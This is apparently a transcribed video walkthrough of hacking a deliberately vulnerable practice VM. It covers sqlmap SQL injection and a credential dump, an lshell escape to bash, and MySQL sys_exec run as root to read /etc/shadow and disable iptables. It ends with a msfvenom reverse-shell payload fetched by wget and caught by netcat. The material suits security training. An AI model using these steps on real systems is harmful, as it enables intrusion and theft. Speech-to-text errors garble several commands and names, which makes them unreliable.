Hi, this is Muhammad Ramadan from Ninja Sec team. We will talking about today how we can hack or attack Kyobetrix VM level 1.3. We will download it by clicking on this link and save in our PC and run it through a VMware player or VMware workstation. Let's start Firefox. And go to IP address of Kyobetrix level 1.3. Click enter. As you can see, we are faced with login page. We see username and password. Let's try put admin. Wrong. Try admin password, also wrong. Try admin without anything, also nothing. Okay, now we will try to test for SQL injection attack. Let's input apostrophe in username field and click login. We don't see anything. Let's try in password field, login. Oh, we see a SQL injection error. We see that is error based SQL injection vulnerability. We can try another tool, Mantra. Let's first close Firefox and open Mantra. And open our target. We will use SQL Inject me. Open, and we will test this page with test all forms with all attacks. Testing now. We found that my password, some errors, tested value, this one and this one and this one, 302 mean it is redirect us to another page when we input this value or this login page redirect us to another page. Let's copy this one, test it in password field, try to login, found that we are something went wrong. Let's see what happened in Burp Suite. With Burp Suite, we will use Burp Suite to see HTTP requests. We will vulnerability assessment, application, boxes, or WASP, ZAP. Okay. And configure the proxy options, proxy connections, local proxy. We will make it listen on 8080. Okay, local host, and edit preference, advanced network settings, 8080. Okay, close. Let's try from start. Copy this value and paste and login. See what happened. First we sent a GET request to this page. Sorry, we first post our value in my password here. You can decode it. Decode. This is decoded value. This one. Okay. Then we found 302 status that redirect us to another page called member.php, and also we redirected to another page called login success. As you can see, we can try another username. It's admin. Nothing. Let's try to insert this value in both fields, my username and my password. Same thing. Nothing. Let's try to find if there is a XSS script alert. Hi. Script. It is XSS vulnerability. So we found another vulnerability called XSS, cross-site scripting. We can use it to hack admin, but there is no admin here. Only it is a virtual operating system. It is not live. So we can exploit this vulnerability, SQL injection, that we found by using SQL inject me. We will use SQL map. Let's go to cd test database ls SQL map and run it. Sorry, SQL map.ui. We can, as we know, it is a post SQL injection. I mean, there is no something like id equal 1. So this is get request, but we deal here with a post request. View big source. We found that my password and my username and submit our post parameters. We can put all these parameters by our hand, but we can make SQL map find and test all parameters automatically. Let's copy this URL only, paste, and dash forms. Sorry, we forget to put -u. This is URL we wanted to test, and dash forms to find all post parameters. Click enter. Searching for forms, found 3 parameters. Okay, test it. Yes. No, we don't want. Click enter. Okay. Yes. Let's find something called as you can see, it is MySQL server. So we know that our target database server is MySQL, not Oracle or Microsoft or PostgreSQL. We can stop and specify --dbms database management system equal MySQL. Okay, yes, yes. As we know that my password is the only parameter that have SQL injection vulnerability. I mean username is not vulnerable, only password. We can cancel this and go to next parameter. Next, testing if post parameter my password is dynamic. Heuristic test shows that post parameter might be injectable. It is somehow slow. We can speed this up. Dash dash threads equal 5. Okay, yes, enter, yes. I'm going to test my password parameter. You can see that SQL map only tests for mysql injection, no other thing like here Microsoft or Postgre, Oracle, only MySQL server. So we can speed up this operation. We found that we got a redirect to another page. No, we don't to stay on our original page. Type 2, this option, hit enter. Okay, good sign. We found that target URL appears to be a union injectable with 3 columns. Okay, that's good. It is slow. We will wait till it finish. You can view all the requests sent by SQL map by using Wireshark. Okay, we can use interfaces. This is our interface, TUN0. Click start. You can find that all HTTP protocol requests here. For this one, found that SQL map sent this request, my username, and you will see many requests. So it can speed up our job. Let's stop. Quit. As you can see, it failed that post parameter my password is not injectable. This is very bad. We can increase level of risk dash dash risk equal 3 and dash dash level equal 3 2. Yes, enter. Yes, we want to test next parameter. We use the risk equals 3 and level equals 3, so SQL map can test more and more and find another queries that we can use it to exploit this vulnerability. So it can increase our chances to attack the system and dump all databases. Okay, we want to stay on the original page. Okay, it is good. It is post parameter. My password is or boolean based, blind, where, or having clause is injectable. Okay, as you can see, MySQL only. Okay, that is good. You can use also Nmap to scan our target. And find all SV. You can use also aggressive mode. Find all services names and versions and operating system type. Can view in my progress here by click only enter. Send still scan. Wait. Okay, it's very good. Post parameter, my password is vulnerable. No, I don't want to test any other, so click type in and click enter. Okay, we will accept. Okay, we want to exploit this SQL injection. Okay, that is very good. It is now MySQL server and post parameter, my password is blind boolean based SQL injection. We can find another we can find all other databases. Let's type -- dbs databases to find all databases. Okay, yes, enter. Yes, I want to exploit this one. It is okay. I want to stay. It is blind, so it is will take some time. As we can't see any error on page. So the process of retrieving databases will take some time. Okay, it found that there are 3 databases in MySQL server, and it found that first database name length is 18. Okay, if this vulnerability is error based, my SQL injection, it will be very fast. You will find all database names in no time, but it is blind, so it will take some time. First one is information schema. This is default database that comes with MySQL server. So we want another database. The next one 7 characters. Okay, members, this is next database name. The next one or third one name is 5 characters. Okay, we found 3 databases. First one is information schema. It's come by default with MySQL server, and third one is MySQL database, come also by default, but members didn't come by default with MySQL server. So we are interested in this database, members only. We want to dump this database. Let's try this. Remove this dash d database members dash dump. So we specify only database, it's called members, and we want to dump all this database. Yes, enter, yes. Okay, I want to explore this and stay on the original page. Now retrieving the length of a query input. It's only one table in this database. As you can see here. First table, or the only table called members. Now SQL map try to fetching columns for members table in members database. Okay, first column name is called ID. Second column name contains 8 characters. Okay, retrieving now. I think the username. Okay, right, the username. And final colon, also 8 characters. I think it is password, as most databases contains ID, username, password. Wait and see. Password. Oh, great. We have now ID and username and password. 3 columns found in table called members in database called members. Now it dumping all entries in this table. Okay, as you can see here, that query output is 1, so I think that is ID 1 and username. In column username we found that my name is John. Maybe it is username or password, we are not sure yet. Okay, I think that John username and my name is John is password. We will find that later. Okay, now we find that the length of the query output is 21 and is now retrieving it. ADGA fine, found that. This seems that a password, not a username, so we can find that is password. Oh, finally we found that database called members contains only one table called members. That table contains three columns called ID, password, username. In first column called ID there is 1 and 2 entries, and second column password contains my name is John and this characters, and third column username contains John and Robert. We can try to log in with username John, and password my name is John, as you can see here, and login. Something went wrong. Members control panel was wrong, I don't know. Let's try Robert, and Robert password this one, login, and members control panel username Robert and password log out. That's great. We can't find anything useful here. We can try to manipulate this parameter called username. Let's try to find inclusion. Okay, I think there is a file inclusion vulnerability here. Let's try to include /etc/password file username. Okay, we can this one point, this one too, this one too. Try null byte. Can try this. I think it is not vulnerable to this type of vulnerability, file inclusion vulnerability or file inclusion attack. Let's find what Nmap can do. We found that open port SSH secure shell 22 and port 80 open. We know that we are using HTTP server, and this port is open and this port is open like Windows, but it's a Samba server. Fingerprint, it is Linux, right? We found that NetBIOS name called Carbitrix 4, and that is in work group. Trace route. Okay, great. We found that SSH is open. Let's try to log in with this username and password and see what happens. Let's type SSH John at our target IP, enter, and will ask us for password. Let's copy this one and hit enter. Oh, wrong. Why wrong? Because I copied this with space. No, copy this again, hit enter. Great, we now have a shell on this machine. We can now try to run any command we want and try to briefly escalate ourselves. ID, BWD. What is that? This is, I think this is a Linux shell. Let's type help and see what happened here. Oh, only these commands are available to us. 1 2 3 4 5 6 7. Why this happen? What I think if we want to connect to any Linux shell, we will find something like that. Help, and we can run any command we want, but as you can see here, we are restricted and we are in jail, like something called Lshell, limited shell. Let's search about it. Lshell. Oh, I think this is the right one. Limited shell is a shell coded in Python, but let's restrict a user environment to limited sets of commands. Oh, it works in Debian. We are on Debian system, as you can see here. We're Debian, Ubuntu. We want to jailbreak this shell and try any command we want, like id, bwd. Let's try to type this echo. We see that echo is available to us, and os.system bracket apostrophe slash bin slash bash apostrophe bracket, enter. That's fine. We are now jailbroken. Like iPhone, we can jailbreak any iPhone we want, like iPhone 4S, to execute any command we want. And we already made this on this system. Let's try id. Okay, that is very nice. We are John bwd ls cd slash ls. Nice, very nice. We want to find user u name dash a. It is Linux Skypetrix 4 kernel version 2.6 2.4 -24, old 2009. Let's try this command gcc. Oh, gcc can be found, command not found. We use this command to compile our Linux kernel exploits, but it is not available for us. Let's see if PHP is available here. Also, PHP is not installed. Let's try this PHP 5-CLI. Also this one. Let's find all processes. bs efux. Okay, user John only. No, eux. Okay, we found many processes, but we only interested on processes that root that is running on with root privileges. We will type aux grep root. Here we see only root process. Let's see. Okay, oh, we found that mysql running with root privileges. We can try to connect to MySQL server using this command, mysql -u root dash b. You can also add this command dash h to host, local host. It will ask us for password. Let's hit enter. Oh great, only root with password, no password, sorry, there is no password at all. I think we are now have MySQL server that running with root privileges. We can try to read files. Let's read this one. Select, you can type it with caps lock or small as this one, load underscore file e/etc/password. Very nice, we found that etc password file here. Let's try to read shadow file. There's something is wrong here. Shadow, we can't read it at all. Let's try to execute system commands with MySQL. We hope that MySQL UDF library is loaded in this system. Let's type select says underscore exec cat this file and send it to /temp/s.txt. Oh, I think that MySQL UDF library is loaded in the system. That's cool. We'll go to cd/temp ls. Sorry, we will log out from MySQL console, cd/temp ls, and the cat to s.txt and find what. Oh, permission denied. Let's see why. You can see that s.txt is only root. Let's try maybe to work. chown, change owner, John, our user, s.txt, not permitted, operation not permitted. We can type this command in MySQL here. Okay, chown John, our username, hit enter and exit ls-l. Found that John is owner of this file. Let's view it. Text. That is awesome. We now read shadow file. We can crack this file with John the River GTR. You can find it in backtrack, but it may take some time, and we must join password file and shadow file in only one file and crack it with John. You can use unshadow program to join both files and try to crack them, but we already are root, but we need some method to make us get a reverse shell from victim machine and our attacker machine. Let's try to make a command. Sorry, let's type a command to see what IP tables have. Let's type mysql dash u root dash b. We don't have to type dash h localhost, as mysql will try to connect to localhost by default. Let enter. Let's type select sys underscore exec ib tables dash l to list all rules, and send it to slash temp slash let's I.text, and join this command and ch on join slash temp slash I.text, and send this query something wrong ib tables slash l. Sorry, we must type cat. Something wrong too. ch, as you can see, something ch on and okay, we can type only command per query. Sorry, we can't cat ib tables, this is my mistake. Okay, that's fine. Now we've changed this owner from root to join. Let's type ch on join file, let's exit, and cat I.text. Oh, we found that ib tables is up and running in this server. If anyone try to connect to this port and this and this and this, it will drop it automatically. Also, if there's output, a reverse connection to any port from this, it will be dropped automatically. We can try to make a reverse shell for Linux and connect it to our machine. We will use msvenom here is options for msvenom. We will type msvenom dash l and payload to list and view all payloads that is available for us. It will take some time. You know what is Ruby language, it's very slow in execution time. Okay, we will choose we know that is a Linux target or system. We will choose only Linux shellcodes. We want shellcode Linux. We don't know if it is x86 or x64. Let's type this uname dash a. Okay, it is x68. Close in map. What we will do now, we will try to make or generate Linux reverse TCP payload that works on x86 architecture. Let's go to MS Venom and choose this one, Linux x86 interpreter. No, we want a normal shell, but with root privilege. Let's choose this one, reverse TCP. It is not staged, only one piece, and -H to see other options. Well, type B has a payload type, this one, this is payload type, and lhost equals our lhost. We can find it by typing fconfig, and we found that our IP is 1550, and port equals 1010. Make it 1000. No encoder, no architecture, and format -F. What format we want? We have many formats here to choose from. We only interested in ELF format, executable Linux file, ELF, and we want to generate this file, shellcode or payload, and send it to /var/www/ let's rename it v. Hit enter. So we used MS Venom to create a payload called Linux shell reverse TCP that works on x86 architecture, and specified that our local host IP and our local port and a format of this payload, we want it to be ELF, and send it to this location /var/www/v. First we will start Apache service, Apache 2 start. It is already running. Okay, cool. Now we will get or wget this file and execute it with root privilege and listen, but let's first listen with our MSF. No, we can try ncat. It's ncat -l listen vv verbose port 1000. Okay, so netcat is listening on port 1000. So if any reverse connection from outside come to us, we will accept it automatically. Let's first use mysql select says _exec bracket this wget. This is our IP config 10.0. This one, and file that we have v, it's called v, and we want to save this file -o output in /temp/v bracket close our, we will wait. Our command is being executed. As you see now that our command is failed because IP tables block any outside connection from victim machine to anywhere. As you can see, it will drop any connection to TCP port 80 for www, and our command will not work. Okay, we can try to stop IP tables and all ports will be open for us, either inbound or either outbound. Let's stop this command. Okay, thank you. And I found great script, this one. We will download, copy this script and make file nano IP tables, shift insert to paste whole file. Okay, Control X from your keyboard and press yes and save. Now we will use mysql to move this file to this location, but first let's do the chmod 755 IP tables. We made this to make IP tables executable program. Let's mysql -root -b, enter, and select sys underscore exec and cd change directory /temp, and after you change your directory to temp, copy IP tables to /etc/ini t.d/IP tables and enter. Great, our command executed successfully. First we changed our directory to temp and we are in temp directory now. We will move IP tables to this location. Okay, let's change something here. Make chon root dot root, so only root who can play with this file, and make sure it is executable chmod +x, or you can type this 755, the same thing, but we want to change +x. Hit enter. Let's try to stop IP tables. We will type this command and stop. Okay, that's great. Let's try to wget our file here. Let's hit enter. That is very cool. Now we stop we managed to stop IP tables, and now all connections from inside or outside are available. Let's change this file to executable file. As you can see, netcat is listening on port 1000, and our payload or share-code v will try to connect to us on port 1000. Let's type chmod 755 and we will run it with root privilege cd/temp and run. As you can see, we will enter temp directory and run this file at enter. As you can see, our netcat shell is listening on port 1000 and we got a connection. Let's type id. We are root now. Let's type pwd. We are in temp. Why we are in temp? Because we executed our payload in temp directory. Okay, let's change directory to root directory, cd/root ls, and we found that yes, it is Lshell as we see before here. And congrats file. Let's cat congrats text. Okay, congratulations, you have got root. There are many ways as thanks for playing Lone Ferret, and thank you for this great challenge. Muhammad Ramadan was here from NinjaSec. Thank you for watching, and you can go to our site ninjasec.com here, ninjasec.com, and you can find a great course for learning penetration testing and SQL hacking in real world scenarios and situations with detailed steps, and also there is advisories, blog forums. Thank you for watching again. I hope you learned something useful. Bye.